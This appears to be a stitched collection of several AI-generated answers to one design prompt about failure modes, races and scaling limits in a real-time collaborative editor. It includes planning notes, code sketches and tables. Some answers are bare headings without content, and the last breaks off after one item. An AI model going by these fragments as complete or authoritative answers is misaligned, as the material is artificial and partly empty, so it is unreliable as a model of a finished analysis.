WebSocket server failure leading to lost in-flight changes: If server crashes after receiving change but before persisting or acknowledging, client may think change failed or resend. Solution: Implement idempotent operation IDs, persist change before acknowledgment, and client retries with same ID. Trade-off: Client-side complexity, need to generate unique IDs.
Load balancer single point of failure: If load balancer fails, service becomes unavailable. Solution: Use highly available load balancer setup (active-passive with failover) or cloud-managed LB with redundancy. Trade-off: Additional cost and complexity.
Redis session cache failure: If Redis goes down, session data lost, users may be logged out. Solution: Use Redis Cluster with replication and automatic failover. Trade-off: Increased operational overhead.
Database primary failure: PostgreSQL primary failure can cause downtime. Solution: Set up streaming replication with failover (e.g., using Patroni). Trade-off: Complexity and potential data loss during failover.
Network partition between server and DB: Server cannot write, edits fail. Solution: Allow offline editing with local queue and sync later using CRDTs. Trade-off: Significant complexity, but improves availability.
CDN caching dynamic API responses: Users may see stale document content. Solution: Configure CDN to not cache API responses, or set proper Cache-Control headers. Trade-off: Increased load on origin servers.
JWT stored in localStorage vulnerable to XSS: Attackers can steal tokens. Solution: Store tokens in HttpOnly cookies with Secure and SameSite flags, and implement CSRF protection. Trade-off: More complex to implement, but more secure.
Long JWT expiry increases risk if token stolen: 24 hours is long. Solution: Use short-lived access tokens (e.g., 15 min) with refresh tokens stored securely. Trade-off: More frequent token refresh, need refresh endpoint.
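The rotation scheme can be sketched like this (illustrative Python; `TokenService` and its methods are hypothetical, and a real implementation would sign JWTs and persist refresh tokens server-side):

```python
# Sketch: short-lived access tokens with rotating single-use refresh tokens,
# so a stolen access token is only useful briefly and a replayed refresh
# token is detected.
import secrets, time

class TokenService:
    ACCESS_TTL = 15 * 60  # 15 minutes instead of 24 hours

    def __init__(self):
        self.valid_refresh = set()

    def issue(self):
        refresh = secrets.token_urlsafe(32)
        self.valid_refresh.add(refresh)
        return {"access_expires": time.time() + self.ACCESS_TTL,
                "refresh": refresh}

    def rotate(self, refresh):
        if refresh not in self.valid_refresh:
            raise PermissionError("refresh reuse detected; revoke session")
        self.valid_refresh.discard(refresh)  # each refresh token is single-use
        return self.issue()

svc = TokenService()
t1 = svc.issue()
t2 = svc.rotate(t1["refresh"])   # normal rotation succeeds
try:
    svc.rotate(t1["refresh"])    # replay of the consumed refresh token
    assert False, "replay should have been rejected"
except PermissionError:
    pass
```

Detecting reuse of a consumed refresh token is the key property: it signals that either the client retried or the token was stolen, and the safe response is to revoke the whole session.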
Race Conditions (timing issues leading to inconsistency):
Concurrent updates to same paragraph without proper locking: Two servers read old state, both update, leading to lost update. (Already covered in lost updates, but it's a race condition). Solution: Conditional updates (compare-and-set) as above.
Polling window overlap causing duplicate processing of changes: If servers poll for changes based on timestamp, they may fetch the same change twice, leading to duplicate broadcasts. Solution: Use a monotonically increasing sequence ID for changes, and each server tracks last processed ID. Trade-off: Requires additional bookkeeping per server.
Client reconnection after server crash may cause duplicate operations: If client resends change after timeout, but original change was persisted, duplicate may be applied. Solution: Idempotent operation IDs as above.
Timestamp-based conflict resolution under network delay: with conditional updates, the outcome is decided by timestamp order rather than commit order — if both incoming timestamps exceed the stored one, the first commit lands, and the second is applied only if its timestamp is higher still. That closes the race. What remains is clock skew: a genuinely later edit with a skewed-behind timestamp is rejected incorrectly, which is a correctness failure mode rather than a race, and is only fixed by server-side or logical clocks.
Scaling Bottlenecks (limits to growth):
Database write scalability: Single PostgreSQL primary handles all writes. As number of concurrent edits grows, writes may become bottleneck. Solution: Shard database by organization ID across multiple PostgreSQL instances or use distributed SQL. Trade-off: Application must route queries to correct shard; cross-organization queries become complex.
Polling load on database: Each server polling every 2 seconds causes read load that scales with number of servers. Solution: Replace polling with pub/sub (e.g., Redis Pub/Sub, Kafka) to push changes. Trade-off: Introduces new component, but reduces DB load and latency.
WebSocket connections per server: Node.js may hit limits (e.g., ~65k connections per server due to port range, but actually limited by file descriptors). Solution: Scale horizontally, tune OS limits, use a more scalable WebSocket server (e.g., using Go or Erlang). Trade-off: Adding servers is straightforward; may need to adjust architecture.
Broadcast to many clients on a single server: if one popular document's collaborators concentrate on one server, pushing each change to all of them is O(N) CPU and can build socket backpressure. Mitigations: iterate connections with non-blocking sends, keep per-document client sets so broadcasts don't scan every socket, and rely on the load balancer spreading collaborators across servers (cross-server delivery then goes through pub/sub). Trade-off: acceptable at moderate N; at very large N the document itself has to be partitioned or fronted by a dedicated fan-out tier.
Redis as central cache: As number of users grows, Redis may become a bottleneck. Solution: Use Redis Cluster to distribute load. Trade-off: More complex configuration.
Snapshot generation overhead: Generating full HTML snapshots every 30 seconds for many documents could consume CPU and I/O. Solution: Generate snapshots asynchronously in background workers, and only for active documents. Trade-off: Delayed snapshots, but reduces peak load.
Load balancer round-robin not load-aware: May cause uneven load across servers. Solution: Use load balancer with least connections or based on server health. Trade-off: May require more sophisticated LB features.
Now, we need to present these in a clear, concise manner. The instruction says "Identify all potential failure modes, race conditions, and scaling bottlenecks." So we should list them, perhaps categorized, but ensure each is identified and then a solution with trade-offs.
We should be careful not to over-list; some are duplicates. For example, "lost updates" is both a failure mode and race condition. We can present as one item with both aspects.
Let's produce a structured answer:
We can number them.
Given the breadth, we can combine related issues where appropriate, but the instruction says "for each issue found", so each distinct issue should have its own solution.
I'll produce a list of about 10-15 items, covering the main points.
But let's also consider if there are any issues with the "partitioning by organization ID" scaling plan. It might be insufficient if an organization is very large. That's a scaling bottleneck: hotspot organizations. Solution: further shard within organization by document ID or user. Trade-off: complexity.
Also, the system uses "last-write-wins" which is a simplistic conflict resolution; for collaborative editing, it can lead to poor user experience because typing over each other's changes may be lost. That's a functional issue, not just technical. But we can mention that a more sophisticated approach like OT/CRDT is preferable, but with trade-offs of complexity.
Now, let's draft.
Answer Outline:
Conflict Resolution Using Client Timestamps
Lost Updates Due to Lack of Concurrency Control
Polling Delay and DB Load
WebSocket Server Failure and In-Flight Changes
Load Balancer Single Point of Failure
Redis Session Cache Availability
Database Write Scalability
JWT Stored in localStorage (XSS Risk)
Long JWT Expiry
CDN Caching API Responses
Snapshot Generation Overhead
Polling Duplicate Processing
Load Balancer Not Load-Aware
WebSocket Connection Limits
Offline Support and Network Partitions
We might also mention the issue of "Broadcast to many clients on same server" but it's somewhat covered by scaling horizontally and load balancing. Could be added.
But the list is already long. We need to ensure we cover the main points from the description.
Now, we need to write the final answer in a clear, organized way.
I'll structure as:
Potential Failure Modes, Race Conditions, and Scaling Bottlenecks
But to keep it concise, we can just present each as a paragraph with bullet.
Given the instruction, we can just list each issue and its solution with trade-offs.
I'll produce a numbered list.
Let's start writing.
But before final, double-check the architecture: "Real-time: Each API server maintains its own WebSocket connections to clients" and "Sync Strategy: Last-write-wins with timestamps from client clocks". That is a major red flag. Also "Other servers poll PostgreSQL every 2 seconds for changes". So indeed polling is used.
Now, also note: "Database: PostgreSQL for document storage, Redis for session cache". So Redis is only for session cache, not for real-time. So they might be using Redis for caching sessions, not for pub/sub. So we can propose using Redis Pub/Sub to replace polling, which would also leverage existing Redis, but then we need to ensure Redis is highly available. That's a trade-off: using Redis for both cache and pub/sub might overload it; but can scale.
On storage, step 2 ("Server writes change to PostgreSQL") suggests the document is durable per change, with the 30-second HTML snapshot serving as a backup or fast-load copy rather than the only persistence. The answer should not assume snapshot-only storage, but should note that if each keystroke updates the document record in place, write volume becomes its own problem.
Potential issue: If they update the document record directly on every keystroke, that could be a huge number of writes. Usually collaborative editors buffer changes and send batches. But they didn't specify. That could be a scaling issue: high write rate. But we can mention that sending every keystroke as a DB write might overload DB; batching could help.
But the description says "User types → change event sent via WebSocket". That could be per keystroke, which is a lot. They might want to throttle or batch. But not explicitly a problem? We can add as a scaling bottleneck: high frequency of DB writes. Solution: buffer changes and write in batches, or use a log-based approach with asynchronous compaction. Trade-off: potential data loss if server crashes before flush.
But we already have many items; maybe include.
"User types → change event sent via WebSocket" implies roughly one event per keystroke, which is normal for real-time editing — but "Server writes change to PostgreSQL" then implies one DB write per keystroke. An append-only changes table keeps those writes cheap, but the volume is still high; batching or coalescing writes (flush every N operations or T milliseconds) cuts the load at the cost of losing at most one unflushed batch on a crash.
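A sketch of that coalescing (illustrative Python; `WriteBatcher` is hypothetical, and a real server would also flush on a timer, not only on a size threshold):

```python
# Sketch: coalescing per-keystroke events into batched writes to cut DB load;
# flush on a size threshold (a production version would also flush on a timer).
class WriteBatcher:
    def __init__(self, flush_size=3):
        self.buffer, self.flushes = [], []
        self.flush_size = flush_size

    def on_keystroke(self, ch):
        self.buffer.append(ch)
        if len(self.buffer) >= self.flush_size:
            self.flush()

    def flush(self):
        if self.buffer:                       # one DB write per batch
            self.flushes.append("".join(self.buffer))
            self.buffer.clear()

b = WriteBatcher(flush_size=3)
for ch in "hello":
    b.on_keystroke(ch)
b.flush()                                     # drain the tail on idle/close
assert b.flushes == ["hel", "lo"]             # 5 keystrokes, 2 DB writes
```

The flush interval is the durability knob: a crash loses at most one unflushed buffer, so small batches trade throughput for a tighter data-loss window.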
Also, conflict resolution: if they write each keystroke as an update to the same row (paragraph), that's even worse. Usually collaborative editors use operational transforms where each operation is stored and applied in order. That's more scalable. So the architecture seems naive.
Given the scope, we should highlight that the entire sync strategy is flawed and not suitable for real-time collaborative editing. But the question asks to identify potential failure modes, race conditions, and scaling bottlenecks, and propose solutions with trade-offs. So we can point out that last-write-wins is inappropriate and suggest OT/CRDT.
Now, let's produce the final answer.
I'll write in a structured manner, with each issue clearly labeled, maybe with a heading.
Answer:
The architecture described has several potential issues that could lead to failures, race conditions, and scaling bottlenecks. Below is a list of these issues, along with specific solutions and their trade-offs.
Conflict Resolution Using Client Timestamps
Lost Updates Due to Lack of Concurrency Control
Use optimistic concurrency (e.g. `UPDATE ... WHERE version = read_version`); if the update affects no rows, retry with the new state.
Polling Delay and Database Load
WebSocket Server Failure and In-Flight Changes
Load Balancer Single Point of Failure
Redis Session Cache Availability
Database Write Scalability
JWT Stored in localStorage (XSS Risk)
Long JWT Expiry
CDN Caching API Responses
Set `Cache-Control: no-cache, private` headers on dynamic endpoints.
Snapshot Generation Overhead
Polling Duplicate Processing
Load Balancer Not Load-Aware
WebSocket Connection Limits per Server
Offline Support and Network Partitions
High Frequency of Database Writes
These improvements would address the major risks and scalability limits, albeit with added complexity and potential trade-offs in performance, cost, or development effort. The exact choices depend on the required consistency, latency, and scale.
Certainly! Let's break down the potential failure modes, race conditions, and scaling bottlenecks in the architecture, and propose solutions for each.
Single Point of Failure in WebSocket Connections:
Database Overload:
Redis Cache Failure:
JWT Token Expiry Management:
Last-Write-Wins Conflict Resolution:
WebSocket Broadcast Delays:
WebSocket Server Scalability:
Database Read/Write Scalability:
Polling for Changes:
CDN Caching Strategy:
WebSocket Load Balancer:
Distributed Database or NoSQL:
Redis Clustering or Managed Service:
Token Refresh Mechanism:
Operational Transformation (OT) or CRDTs:
Message Broker for Real-time Messaging:
WebSocket Server Cluster with Shared Message Bus:
Database Sharding or Distributed Database:
Message Broker for Change Propagation:
Granular Caching Strategy:
By addressing these issues, the architecture can be made more robust, scalable, and reliable, albeit with increased complexity and potential costs.
WebSocket Connection Failures:
Single Point of Failure in PostgreSQL:
Race Conditions in Conflict Resolution:
Polling Overhead:
JWT Token Expiry and Security:
CDN Caching Issues:
Scaling Bottlenecks in WebSocket Servers:
Document Partitioning Issues:
By addressing these issues, the architecture can become more robust, scalable, and secure, ensuring a better user experience in a real-time collaborative document editor.
This architecture has several significant flaws, particularly concerning real-time consistency, data integrity, and horizontal scaling complexity.
Here is a detailed breakdown of the potential failure modes, race conditions, and scaling bottlenecks, along with proposed solutions and their trade-offs.
These issues directly impact the user experience and correctness of the document state.
The Issue: The core problem lies in how state synchronization happens between the API servers.
Race Condition: A race condition exists between an edit being written by Server A and Server B polling for that edit.
Solution: Eliminate Polling and Use a Central Message Broker.
Publish each change to a per-document channel (e.g., document-updates:doc_id_123).

The Issue: The sync strategy relies on Last-Write-Wins (LWW) using client-provided timestamps. Client clocks are notoriously unreliable, leading to incorrect conflict resolution.
Solution: Use Server-Assigned Timestamps or Operational Transformation (OT) / Conflict-Free Replicated Data Types (CRDTs).
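A server-side sequencer is only a few lines. The sketch below (hypothetical names) shows the core idea: the server, not the client clock, decides the order of operations by stamping each accepted operation with a per-document revision number.

```javascript
// The server assigns a monotonically increasing revision per document.
// Client timestamps are kept only as metadata, never used for ordering,
// so ordering is deterministic regardless of clock drift.
const revisions = new Map(); // docId -> last assigned revision

function sequenceOp(docId, clientOp) {
  const next = (revisions.get(docId) ?? 0) + 1;
  revisions.set(docId, next);
  return { ...clientOp, rev: next };
}
```

All replicas then apply operations in `rev` order, which removes clock skew from the conflict-resolution path entirely.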
The Issue: Documents are only saved as full HTML snapshots every 30 seconds. If a server crashes or the network drops between the last save and an edit, that edit is lost (unless the Message Broker is 100% durable and all servers correctly process the backlog).
Solution: Commit Every Change to the Database.
These issues relate to how the system handles increased load.
The Issue: "Each API server maintains its own WebSocket connections." This makes scaling difficult because user state (which document they are editing, which server they are on) is sticky. If Server A goes down, all its connected users instantly disconnect and must re-establish a session, potentially connecting to a different server (Server B).
Solution: Introduce a Centralized WebSocket Gateway/Proxy.
The Issue: If every change (even small text insertions) is written directly to PostgreSQL, the write throughput requirement will rapidly exceed what a single primary PostgreSQL instance can handle, even with read replicas handling reads.
Solution: Utilize Redis for High-Frequency Write Buffering/Sequencing.
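One way to sketch the buffering idea, with hypothetical names: edits accumulate in memory and are persisted in batches, so the database sees one round-trip per batch rather than one per keystroke.

```javascript
// Write-behind buffer: `persistBatch` receives an array of operations
// (in production: one multi-row INSERT or a Kafka produce) either when
// the batch is full or on an explicit flush.
function makeWriteBuffer(persistBatch, maxBatch = 50) {
  let pending = [];
  return {
    add(op) {
      pending.push(op);
      if (pending.length >= maxBatch) this.flush();
    },
    flush() {
      if (pending.length === 0) return;
      const batch = pending;
      pending = [];
      persistBatch(batch); // one round-trip for the whole batch
    },
  };
}
```

A real implementation would also flush on a short timer (e.g., every 50 ms) so a lone keystroke is not held indefinitely; that is omitted here for brevity.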
The Issue: The CDN (CloudFront) is configured to cache API responses for 5 minutes. For a real-time collaborative editor, API responses are generally used for initial document loading or fetching metadata. Caching them for 5 minutes is highly risky.
Solution: Restrict CDN Caching to Static Assets Only.
Cache-Control: no-cache, no-store, must-revalidate).The Issue: JWTs with 24-hour expiry are stored in localStorage.
Solution: Use HttpOnly Cookies for Session Management.
localStorage for authentication, use traditional session cookies marked as HttpOnly and Secure. The backend issues this cookie upon successful login. HttpOnly prevents client-side JavaScript (including malicious scripts) from accessing the token.The Issue: The architecture implies JWTs are used for the initial HTTP connection, but it doesn't specify how the WebSocket connection is authenticated. If the WebSocket simply upgrades the connection without re-validating the session (e.g., relying on the client sending the old token in the upgrade request), security is weak.
Solution: Validate Token on WebSocket Upgrade.
This architecture, while functional, has several critical flaws, particularly in its real-time synchronization, data consistency, and scaling strategy.
Here is a detailed breakdown of the potential failure modes, race conditions, and bottlenecks, along with proposed solutions.
The core weakness is the reliance on Last-Write-Wins (LWW) with client-side timestamps and the server-polling strategy.
| Issue Type | Failure Mode / Race Condition | Explanation | Proposed Solution & Trade-offs |
|---|---|---|---|
| Race Condition | Inconsistent State Due to Client Clock Drift | If User A (with a fast clock) and User B (with a slow clock) edit the same section, the LWW strategy will incorrectly favor User A's change, even if User B's change occurred later in real-time. | Server-Side Timestamping (Preferred): The server applies the timestamp upon receiving the change. Trade-offs: Simple to implement. Requires clients to trust the server's time. Still susceptible to network latency variation (changes arriving out of order). |
| Data Consistency | Missing Updates Due to Polling Gap | Server 1 receives a change, writes to PostgreSQL, and broadcasts to its clients. Server 2 polls PostgreSQL every 2 seconds. A client connected to Server 2 might miss the update for up to 2 seconds, leading to a stale view and potential LWW conflicts when they eventually submit a change based on old data. | Centralized Pub/Sub for Inter-Server Sync: Use a distributed message queue (e.g., Kafka, RabbitMQ) or a dedicated pub/sub layer (e.g., Redis Pub/Sub) to broadcast changes instantly across all API servers. Trade-offs: Adds complexity and another critical component (the message broker). Significantly reduces synchronization latency. |
| Data Consistency | Non-Deterministic Conflict Resolution | Using LWW on full paragraph edits is coarse-grained. A user might lose significant, non-overlapping work if another user saves a trivial change to the same paragraph slightly later. | Operational Transformation (OT) or Conflict-Free Replicated Data Types (CRDTs): Move away from LWW snapshots. Use OT or CRDTs to merge fine-grained operations (insert character, delete character) mathematically, ensuring all collaborators converge to the same state regardless of the order of arrival. Trade-offs: Highly complex to implement and debug. Required for a professional collaborative editor. |
| Race Condition | Broadcast Inconsistency (Split-Brain) | Server 1 writes to PostgreSQL, broadcasts to its 10 clients. Before Server 2 polls, Server 1 crashes. The change is in the DB, but 90% of the clients (on other servers) don't see the change until Server 2 polls 2 seconds later. | Requires Centralized Pub/Sub (Solution to Polling Gap): A centralized message broker ensures that if S1 successfully commits to the DB, it also commits to the message queue, guaranteeing the broadcast will happen even if S1 fails immediately afterward. |
| Failure Mode | Database Write Bottleneck | Every single character typed by any user results in a PostgreSQL write. This high-frequency write load will quickly overwhelm a single PostgreSQL instance, especially during peak usage. | Batching Writes and Asynchronous Persistence: The API server should buffer changes locally for a very short period (e.g., 50ms) and submit them as a single batched transaction to PostgreSQL. Use a durable message queue (e.g., Kafka) as the primary write buffer, allowing the DB writer process to consume and persist changes asynchronously. Trade-offs: Increases complexity. Improves write throughput dramatically but slightly increases the latency of final persistence. |
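The OT row above can be illustrated with the simplest possible transform, two concurrent inserts (function names hypothetical; production OT, e.g. in ShareDB, also handles deletes and position tie-breaking):

```javascript
// Transform a pending insert against a concurrent insert that was applied
// first: shift our position right if the applied insert landed at or before it.
function transformInsert(op, applied) {
  if (applied.pos <= op.pos) {
    return { ...op, pos: op.pos + applied.text.length };
  }
  return op;
}

function applyInsert(doc, op) {
  return doc.slice(0, op.pos) + op.text + doc.slice(op.pos);
}
```

Applying two concurrent inserts in either order, with the second transformed against the first, yields the same final document — the convergence property that LWW lacks.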
| Issue Type | Bottleneck / Failure Mode | Explanation | Proposed Solution & Trade-offs |
|---|---|---|---|
| Scaling Bottleneck | Sticky Sessions (Load Balancer) | While not explicitly stated, if the load balancer uses round-robin without any persistence mechanism, a client might hit a different API server on a reconnect, forcing a new WebSocket connection and potentially losing context. | Use a Layer 7 Load Balancer with Consistent Hashing or Sticky Sessions: Ensure that a client is consistently routed to the same API server based on its ID (if possible) or use a sticky session duration long enough to cover typical connection drops. Trade-offs: Sticky sessions can lead to uneven load distribution if one server has a few very high-traffic users. |
| Failure Mode | Document Snapshotting Overhead | Saving the full HTML snapshot every 30 seconds for every active document is extremely storage-intensive and generates massive write spikes every half-minute. | Differential Versioning / Change Logs: Instead of full snapshots, store a chronological log of the tiny operational changes (the diffs). Periodically (e.g., every 5 minutes or 1000 operations), the server can generate a full "base" snapshot from the logs. Trade-offs: Reduces storage and write spikes significantly. Requires complex logic to rebuild the document state from the logs. |
| Scaling Bottleneck | Redis Single Point of Failure (SPOF) | Redis is used for session caching. If the single Redis instance fails, all users are logged out, forcing re-authentication and potential service outage. | Redis Sentinel or Cluster: Implement a highly available Redis setup using Sentinel (for automatic failover) or a full Redis Cluster (for sharding and high availability). Trade-offs: Increases operational complexity but eliminates the SPOF risk for session management. |
| Failure Mode | Loss of WebSocket State on Server Restart | WebSocket connections are stateful. If an API server restarts, all connected clients are dropped and must reconnect, causing a temporary service disruption and increased load on the remaining servers. | Graceful Shutdown and Connection Draining: Implement a process where the server stops accepting new connections, allows existing connections to finish their current transactions, and sends a "reconnect soon" signal before shutting down. Use a load balancer health check to quickly remove the failing server from the rotation. Trade-offs: Reduces abrupt disconnects but increases complexity in deployment pipelines. |
| Scaling Bottleneck | Document Partitioning Strategy | Partitioning only by organization ID means that very large organizations (e.g., 100,000 users) could still overwhelm a single database shard. | Compound Partitioning: Partition by Organization ID first, then by Document ID. This distributes the load for extremely active organizations across multiple shards. Trade-offs: Increases complexity of routing and cross-shard queries (if needed), but greatly enhances maximum scaling capacity. |
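The compound-partitioning row can be sketched as a hash of the combined key (helper names hypothetical; FNV-1a is used here only as an example hash):

```javascript
// 32-bit FNV-1a hash of a string.
function fnv1a(str) {
  let h = 0x811c9dc5;
  for (let i = 0; i < str.length; i++) {
    h ^= str.charCodeAt(i);
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  return h;
}

// Hash org ID and document ID together, so one huge organization's
// documents spread across shards instead of pinning the org to one shard.
function shardFor(orgId, docId, shardCount) {
  return fnv1a(`${orgId}:${docId}`) % shardCount;
}
```

Note that plain modulo reshuffles most keys when `shardCount` changes; a consistent-hashing ring would limit that churn at the cost of extra routing logic.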
| Issue Type | Failure Mode / Security Risk | Explanation | Proposed Solution & Trade-offs |
|---|---|---|---|
| Security Risk | JWT in localStorage | Storing JWTs in localStorage makes them highly vulnerable to XSS (Cross-Site Scripting) attacks, as any malicious script injected into the page can easily access and steal the token. | Use HttpOnly Cookies: Store the JWT token (or a reference token) in an HttpOnly cookie. This prevents client-side JavaScript from accessing the cookie, mitigating XSS risks. Trade-offs: Requires careful handling of CSRF (Cross-Site Request Forgery) protection (e.g., using a CSRF token in headers). |
| Failure Mode | CDN Caching of API Responses | Caching API responses for 5 minutes is fundamentally incompatible with a real-time system. If an API endpoint is hit directly (e.g., to fetch the document's initial state), that state could be 5 minutes old. | Disable Caching for Dynamic/API Endpoints: Ensure CloudFront only caches static assets (/images, /js, /css). API endpoints (e.g., /api/v1/docs/) must have caching explicitly disabled or set Cache-Control: no-store, max-age=0. Trade-offs: Reduces CDN cost savings for dynamic content, but ensures data freshness. |
| Failure Mode | Front-end Error Handling | If the client's WebSocket connection drops, the application must handle the reconnection gracefully, resending any operations that were queued during the disconnect. | Client-Side Operation Queue and Sequence Numbers: The client should maintain a queue of pending operations and use a global sequence number (or version number) obtained from the server. Upon reconnection, the client sends its last known sequence number, and the server replays any missed operations. Trade-offs: Adds significant complexity to the frontend state management. Essential for robust real-time applications. |
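The catch-up mechanism in the last row can be sketched with a server-side sequence log (names hypothetical):

```javascript
// Ordered operation log per document. A reconnecting client reports the
// last sequence number it saw and receives everything after it.
const opLog = []; // server-side: [{ seq, op }]

function appendOp(op) {
  const seq = opLog.length + 1;
  opLog.push({ seq, op });
  return seq;
}

function opsSince(lastSeq) {
  // Everything the client missed while disconnected.
  return opLog.filter(e => e.seq > lastSeq);
}
```

The client mirrors this with a queue of locally pending operations that it re-submits after replaying the missed ones.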
Of course. This is an excellent exercise. The provided architecture has several critical issues that would prevent it from functioning as a reliable, scalable, real-time system.
Here is a breakdown of the potential failure modes, race conditions, and scaling bottlenecks, along with proposed solutions.
This is the most critical data integrity problem in the architecture.
As the number of API servers grows (N), the number of polling queries to the database increases linearly (N queries every 2 seconds). This creates immense, constant, and largely useless load on the database, making it the primary bottleneck for the entire system.

When a server receives a change to document-123, it publishes that change to a document-123 topic/channel on the message bus (e.g., Redis Pub/Sub, RabbitMQ, or Kafka). Every other server with clients editing document-123 will be subscribed to that topic.

Storing the JWT in localStorage is a well-known security risk. It makes the application vulnerable to Cross-Site Scripting (XSS) attacks. If an attacker can inject malicious JavaScript onto the page (e.g., through a third-party library), they can read the JWT from localStorage and send it to their own server, allowing them to impersonate the user and gain full access to their account. Use httpOnly cookies to store authentication tokens.
An httpOnly cookie cannot be accessed by JavaScript, which mitigates XSS-based token theft. A common pattern is a long-lived refresh token in an httpOnly cookie and a short-lived access token (the JWT) in memory on the client. When the access token expires, the client uses the refresh token (sent automatically by the browser) to silently request a new one.

Of course. This is an excellent exercise. The proposed architecture has several critical flaws that would prevent it from functioning as a reliable, real-time, or scalable system.
Here is a breakdown of the issues, categorized for clarity, along with specific solutions and their trade-offs.
This is the most severe data integrity problem. Client-side clocks cannot be trusted; they drift, can be set incorrectly, or can be manipulated by a user. This will lead to definite data loss.
Scenario:
Solution: Implement a proper concurrency control algorithm like Operational Transformation (OT) or use a Conflict-free Replicated Data Type (CRDT).
With OT, edits are expressed as operations (e.g., insert 'a' at position 5, delete 1 char at position 12). A central server receives operations, transforms them against other recent operations to ensure they can be applied correctly, and then broadcasts the transformed operation. Each operation is versioned sequentially.

Trade-offs:
Caching API responses for a real-time collaborative document for 5 minutes is fundamentally incorrect and will cause major consistency problems.
Scenario:
Solution: Do not cache the API endpoints that serve document content. The CDN (CloudFront) should only be used for its primary purpose: caching static assets like JavaScript bundles, CSS files, images, and fonts. API calls for dynamic content like a document body must always go to the origin servers.
Trade-offs:
This is the most severe scaling bottleneck. The architecture does not support real-time communication between users connected to different servers. The 2-second polling is a slow, inefficient, and unscalable workaround.
Scenario:
At scale, polling generates constant database load (e.g., 100 servers * 30 queries/min = 3,000 queries/min) that will crush the database.

Solution: Use a dedicated Pub/Sub Message Bus. Decouple real-time messaging from the API servers. Use a service like Redis Pub/Sub, RabbitMQ, or Kafka.
Each server publishes changes to, and subscribes to, a per-document channel (e.g., doc-changes:document-123).

Trade-offs:
Writing the entire document every 30 seconds is highly inefficient.
Scenario: A 1MB document is being edited. A user changes one character. The system writes 1MB to the database. This creates massive write I/O, wastes storage space, and makes it impossible to have a granular "Version History" feature. It also means up to 29 seconds of work can be lost if a server crashes.
Solution: Store Deltas/Operations, Not Snapshots. Align the storage strategy with the sync strategy (OT or CRDT).
When the server accepts an operation (e.g., insert 'a' at position 5, version 43), it writes that small operation to a database table (e.g., document_operations).

Trade-offs:
The current WebSocket broadcast is "fire-and-forget." If a client has a momentary network blip, they will miss an update and their document state will permanently diverge from everyone else's until the next full save/refresh.
Solution: Implement a Versioning and Catch-up Mechanism. This is a natural extension of using OT or CRDTs.
On reconnect, the client reports its last known version (e.g., I am on v42). The server then queries the document_operations table for all operations after v42 and sends them to the client to "catch up."

Trade-offs:
Storing the JWT in localStorage is a known security vulnerability.
Problem: If your application has a Cross-Site Scripting (XSS) vulnerability (e.g., from a dependency or user-generated content that isn't properly sanitized), an attacker can inject a script that reads the JWT from localStorage. They can then use this token to impersonate the user completely.
Solution: Store the JWT in a Secure, httpOnly Cookie.
When the user logs in, the server sets the JWT in a cookie with the httpOnly and Secure flags.
httpOnly: Prevents JavaScript from accessing the cookie, mitigating XSS-based token theft.
Secure: Ensures the cookie is only sent over HTTPS.
The browser will automatically include this cookie in all subsequent HTTP API requests and in the initial WebSocket connection handshake for authentication.

Trade-offs:
Cookies require CSRF protection, handled with the SameSite=Strict or SameSite=Lax cookie attribute or by implementing anti-CSRF tokens. This is a standard and well-understood security trade-off.

Of course. This is a great exercise. The proposed architecture has several critical flaws that would prevent it from functioning as a reliable, real-time collaborative editor at scale.
Here is a breakdown of the issues, categorized for clarity.
Example: User A edits a paragraph at 10:00:00 EST. User B (in London) edits the same paragraph a second later at 15:00:01 GMT (which is 10:00:01 EST). If User A's computer clock is 2 seconds fast, their change will be timestamped 10:00:02 and will incorrectly overwrite User B's later change. The result is non-deterministic and leads to lost work.

Publish changes to a per-document channel (e.g., doc-changes:document-123) and store each operation as a row (doc_id, user_id, version, operation_payload).

On reconnect, the client reports the document_id they were last editing. The server can then seamlessly re-subscribe them to the document's Pub/Sub channel without the user noticing anything more than a brief flicker.

With the 5-minute CDN cache, a client can fetch /api/documents/{id} and show the old title for up to 5 minutes. This creates a confusing and inconsistent user experience. API routes (/api/*) should be configured to bypass the CDN cache and go directly to the origin (the load balancer).

Storing the JWT in localStorage makes the application vulnerable to Cross-Site Scripting (XSS). If an attacker finds an XSS vulnerability, they can inject script to steal the JWT from localStorage and use it to impersonate the user completely. Set tokens in cookies with the HttpOnly, Secure, and SameSite=Strict flags.
HttpOnly: Prevents JavaScript from accessing the cookie, mitigating XSS-based theft.
Secure: Ensures the cookie is only sent over HTTPS.
SameSite=Strict: Prevents the browser from sending the cookie on cross-site requests, mitigating CSRF.
This removes the token from localStorage entirely; the browser handles token storage and transmission automatically and securely.

This architecture contains several critical flaws that would prevent it from functioning as a "Google Docs" clone. The most significant issues involve data integrity, synchronization latency, and security.
Serve API responses with Cache-Control: no-cache. Rely on Redis for fast document state retrieval.

This architecture contains several critical flaws that will prevent it from functioning as a collaborative editor, likely resulting in data loss, massive latency, and immediate scaling failures.
Here is a breakdown of the failure modes, race conditions, and bottlenecks, along with architectural fixes.
Failure Mode: Client-Side Timestamp LWW (Last-Write-Wins)
Using client-side timestamps for conflict resolution is catastrophic.
Solution: CRDTs (Conflict-free Replicated Data Types) or OT (Operational Transformation)
Instead of sending full HTML snapshots or raw text replacements, send operations (e.g., insert 'a' at index 5).
Failure Mode: Database Polling Strategy
"Other servers poll PostgreSQL every 2 seconds for changes."
Solution: Redis Pub/Sub Backplane
Since you already have Redis, use its Pub/Sub capabilities.
When a server writes a change, it publishes it to a per-document channel (e.g., doc_updates:UUID). All servers subscribe to channels for documents they currently have open.

Failure Mode: Round-Robin with WebSocket State
Solution: Consistent Hashing / Application-Layer Routing
Route connections based on the Document ID, not just round-robin.
Failure Mode: Write Amplification & Data Loss
Solution: Write-Behind Log + Vector/Delta Storage
Failure Mode: CDN Caching API Responses
"CloudFront ... caches API responses for 5 minutes."
Solution: No-Cache Headers for Dynamic Data
Serve dynamic API responses with Cache-Control: no-store, no-cache, must-revalidate. CloudFront should only cache static assets (JS, CSS, Images).

Failure Mode: JWT in LocalStorage
Storing tokens in localStorage makes them accessible to any JavaScript running on the page. If the app has a single XSS vulnerability (common in rich text editors handling HTML), an attacker can steal the token and impersonate the user.

Solution: HttpOnly Cookies
Set the token in an HttpOnly; Secure; SameSite=Strict cookie. The browser handles sending it; JS cannot read it.

Failure Mode: Partitioning by Org ID
Solution: Sharding by Document ID
Shard by hash(DocumentID). This ensures an even distribution of load regardless of the organization size.

This architecture contains several critical flaws that would lead to data loss, inconsistent state, and poor user experience in a real-time environment.
Issue: The architecture only broadcasts changes to clients connected to the same server. Because connections are distributed across multiple servers, users on Server A will never see edits made by users on Server B in real-time.
